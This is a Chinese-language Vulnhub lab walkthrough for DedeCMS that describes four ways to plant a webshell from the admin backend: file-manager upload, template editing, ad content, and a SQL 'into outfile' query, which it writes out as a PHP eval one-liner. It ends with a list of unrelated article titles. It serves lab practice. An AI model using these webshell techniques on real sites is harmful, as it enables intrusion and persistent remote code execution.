当前位置: 首页 > news >正文

Vulnhub-dedecms织梦通关攻略

news 2025/7/2 19:35:31

        姿势一、通过文件管理器上传WebShell

        第一步:进入后台,找到文件管理器上传木马文件

        第二步:使用蚁剑进行连接

#文件地址
http://localhost/dedecms/shell.php

        

        姿势二、修改模板⽂件拿WebShell

        第一步:修改模板文件,删除主页index.htm中原有内容,写入一句话木马

        第二步:更新主页html为index.php

        第三步:使用蚁剑进行连接

http://localhost/dedecms/dede/../index.php

        姿势三、后台任意命令执⾏拿WebShell

        第一步:增加一条广告,内容为一句话木马

        第二步:点击【代码】,将图中显示的路径与站点进⾏拼接....访问测试

        第三步:使用蚁剑进行连接

http://localhost/dedecms/plus/ad_js.php?aid=1

        姿势四、通过后台sql命令执⾏拿webshell

        第一步:找到系统--sql命令⾏⼯具,执⾏select @@ basedir,得到mysql的路径,由此猜测⽹站绝对路径

        第二步:into outfile写⼊⼀句话木马

select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/webshell.php'
        第三步:使用蚁剑进行连接

                                                                                                                               FROM  IYU_

http://www.dtcms.com/a/86823.html

相关文章:

  • TiDB × AI :DeepSeek 时代你需要什么样的数据基座
  • HTML 表单处理进阶:验证与提交机制的学习心得与进度(二)
  • 前端-选中pdf中的文字并使用,显示一个悬浮的翻译按钮(本地pdfjs+iframe)不适用textlayer
  • 嵌入式面经(2)——央企篇
  • 医学图像白血病分割数据集labelme格式245张5类别
  • ES聚合学习(三)
  • git上传文件到远程库
  • 解决 uniapp 开发中权限申请同步告知目的问题| 华为应用商店上架审核问题解决
  • 安装和管理最新的Python3环境(以Mac为例)
  • Docker 数据卷管理
  • Spring 如何管理 Bean 的生命周期?
  • 11--华为防火墙Easy-IP实现原理与配置全解:从“翻译官“到“流量导演“的奇幻之旅(包你看一遍全记住)
  • Django REST Framework 请求封装源码解析与实现流程
  • 1、环境初始化--Linux安装dockerCE
  • Java 集合框架:从数据结构到性能优化,全面解析集合类
  • JavaScript基础-API 和 Web API
  • HIVE安装(详细教程)
  • Python实战(4)-网络编程
  • Liunx系统Microsoft SQL Server数据库还原
  • datawhale组队学习-大语言模型-task5:主流模型架构及新型架构
  • CentOS与Rocky 命令区别
  • python如何获取html中附件链接,并下载保存附件
  • 1.向量数据库milvus standalone单机版搭建
  • MobaXterm:全能终端工具如何重新定义远程开发与运维效率?
  • Linux 常用命令 - last 【显示历史登录用户列表】
  • 在coze工作流中将数据回写到飞书表格
  • ubuntu部署运行xinference全精度对话deepseek本地部署图文教程
  • WPS宏开发手册——使用、工程、模块介绍
  • 【后端】【Django】【ORM】SearchFilter 详解
  • Hive配置JDBC连接